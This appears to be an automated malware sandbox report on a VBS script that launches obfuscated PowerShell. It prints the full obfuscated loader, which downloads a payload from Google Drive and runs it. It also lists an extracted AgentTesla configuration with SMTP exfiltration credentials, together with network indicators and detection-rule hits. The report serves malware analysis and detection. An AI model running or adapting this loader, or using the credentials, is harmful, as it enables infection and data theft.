            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(R
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Umulighed.vbs", ProcessId: 6764, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker BasliDdbolfI.oniyChesi. ChrosStuckpMetc,lBrn.oi AnortSomew(R

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: cmd.exe.5480.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
            Source: unknownHTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1999089456.0000000007459000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1991407968.0000000002D38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2004519989.0000000008470000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbF source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdb#j source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wab.pdb source: newfile.exe

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.4:49740 -> 114.142.162.17:26
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
            Source: Joe Sandbox ViewIP Address: 114.142.162.17 114.142.162.17
            Source: Joe Sandbox ViewASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: ip-api.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.cash4cars.nz
            Source: powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0R
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/i
            Source: wab.exe, 00000009.00000002.2943582396.0000000007242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunFP
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunFXR~l
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 00000009.00000003.1980141801.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download
            Source: wab.exe, 00000009.00000003.1980141801.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=downloadgo
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download
            Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D448E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownHTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49738 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_6912.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
